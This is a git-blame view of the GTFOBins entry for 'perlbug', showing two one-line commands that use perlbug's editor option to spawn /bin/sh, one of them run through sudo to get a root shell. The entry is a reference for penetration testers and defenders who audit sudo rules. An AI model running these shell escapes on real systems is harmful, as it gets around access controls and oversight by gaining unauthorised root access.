1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/perlbug.md

8 lines
161 B
Markdown
Raw Permalink Normal View History

2022-08-05 17:45:01 +02:00
---
functions:
shell:
2022-12-16 13:56:40 +01:00
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
2022-08-05 17:45:01 +02:00
sudo:
2022-12-16 13:56:40 +01:00
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
2022-08-05 17:45:01 +02:00
---